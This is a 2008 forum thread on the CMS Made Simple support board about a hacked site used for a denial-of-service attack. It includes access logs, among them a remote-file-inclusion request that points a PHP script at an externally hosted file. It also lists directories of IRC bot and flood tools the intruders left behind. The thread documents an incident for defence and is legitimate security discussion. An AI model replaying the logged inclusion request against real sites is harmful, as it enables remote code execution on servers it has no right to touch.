Hi to you all,
two of my CMSms-Site have be hackt, a DOS-Attack was started the hoster took the complete server from the net.
There is a new folder under the TMP-Folder. It is called in different ways (sl or fload).
I will post more infos when the server is online again and my provider will send me detailed information.
Because my english is very bad, I will write all other information in german; you can find them here http://forum.cmsmadesimple.org/index.php/topic,22787.0.html.
Regards
Th. Holler
CMSms-Site hack, complete Server down
-
calguy1000
- Support Guru
- Posts: 8169
- Joined: Tue Oct 19, 2004 6:44 pm
Re: CMSms-Site hack, complete Server down
we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
vulnerable script on the serrver.
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
vulnerable script on the serrver.
Follow me on twitter
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Please post system information from "Extensions >> System Information" (there is a bbcode option) on all posts asking for assistance.
--------------------
If you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
Re: CMSms-Site hack, complete Server down
Hicalguy1000 wrote: we need to know
a) what version of CMS you're running
b) what the history of the site is (when did you last upgrade)
c) have you checked your httpd access logs to find out if they came in through CMS or through some other
vulnerable script on the serrver.
here are the answers:
a: 1.3, updated 2 or 3 days ago
b: I normaly update asap; within 2 or 3 days after a new release is online
c: here are the logs
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:18 +0200] "GET /s.php HTTP/1.1" 200 6572 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:21 +0200] "POST /s.php HTTP/1.1" 200 6708 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10/access_log:81.180.210.132 - - [10/Jun/2008:21:59:44 +0200] "POST /s.php HTTP/1.1" 200 6777 "http://www.kiga-menden.de/s.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
08/access_log:72.46.131.186 - - [08/Jun/2008:14:08:33 +0200] "GET //lib/config.functions.php?dirname=http://www.com.ulaval.ca/st-hilaire/id.txt??
HTTP/1.1" 20
0 - "-" "libwww-perl/5.810"
My provider found a file called s.php on the root of the domain and suspicious directories under TMP:
1. Domain, everything in folder FL:
03.09.2006 02:02 20.358 configure
11.06.2008 12:43 contrib
11.06.2008 00:00 64 cyc.acc
11.06.2008 11:00 1.047 cyc.levels
10.06.2008 22:00 6 cyc.pid
11.06.2008 11:00 298 cyc.session
19.05.2008 10:12 1.310 cyc.set
03.09.2006 02:03 4.144 genuser
14.07.2005 14:51 590.481 httpd
10.07.2005 15:31 2.156 Makefile
11.06.2008 12:43 randfiles
05.07.2005 13:38 13.399 stealth
01.06.2006 14:40 21.534 xhide
11 Datei(en), 654.797 Bytes
Verzeichnis von \contrib
11.06.2008 12:43 .
11.06.2008 12:43 ..
11.06.2008 12:43 config
23.06.2001 18:36 1.251 cvsupdate
11.06.2008 12:43 patches
1 Datei(en), 1.251 Bytes
Verzeichnis von \config
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.843 config
07.04.2001 04:38 1.131 Input.pl
11.06.2008 12:43 servers
2 Datei(en), 6.974 Bytes
Verzeichnis von \servers
11.06.2008 12:43 .
11.06.2008 12:43 ..
02.05.2001 09:40 289 DALNET
02.05.2001 09:40 543 EFNET
23.06.2001 04:18 735 UNDERNET
3 Datei(en), 1.567 Bytes
Verzeichnis von \patches
11.06.2008 12:43 .
11.06.2008 12:43 ..
20.06.2001 03:32 6.901 emech-2.8.2-sha.diff
1 Datei(en), 6.901 Bytes
Verzeichnis von \randfiles
11.06.2008 12:43 .
11.06.2008 12:43 ..
07.04.2001 04:38 5.195 randaway.e
07.04.2001 04:38 3.982 randinsult.e
07.04.2001 04:38 830 randkicks.e
07.04.2001 04:38 519 randnicks.e
07.04.2001 04:38 2.495 randpickup.e
07.04.2001 04:38 55.316 randsay.e
07.04.2001 04:38 3.651 randsignoff.e
07.04.2001 04:38 1.465 randversions.e
2. Domain, everything in Dir FLOOD:
08.09.2002 04:51 15.988 juno
09.02.2001 04:30 8.268 slice2
01.10.2001 20:59 8.268 slice3
06.08.2000 14:56 13.399 stealth
07.02.1996 03:38 17.690 synk
07.03.2002 05:29 14.911 vadimII
By now I have added the security-thinks of the security-thread. Hope thats enought.
Regards
Thorsten
-
Pierre M.
Re: CMSms-Site hack, complete Server down
Hello,
it would be nice to know the http logS just before s.php was put in your web space "to find out if they came in through CMS or through some other vulnerable script on the server" (I quote Calguy1000 because my English isn't native either). Can your hosting provider or you give information about this ?
Don't bother with intruder directories : nuke them.
And thanks for your feedback : it strengthem the double slash // URL filtering rule.
Pierre M.
it would be nice to know the http logS just before s.php was put in your web space "to find out if they came in through CMS or through some other vulnerable script on the server" (I quote Calguy1000 because my English isn't native either). Can your hosting provider or you give information about this ?
Don't bother with intruder directories : nuke them.
And thanks for your feedback : it strengthem the double slash // URL filtering rule.
Pierre M.
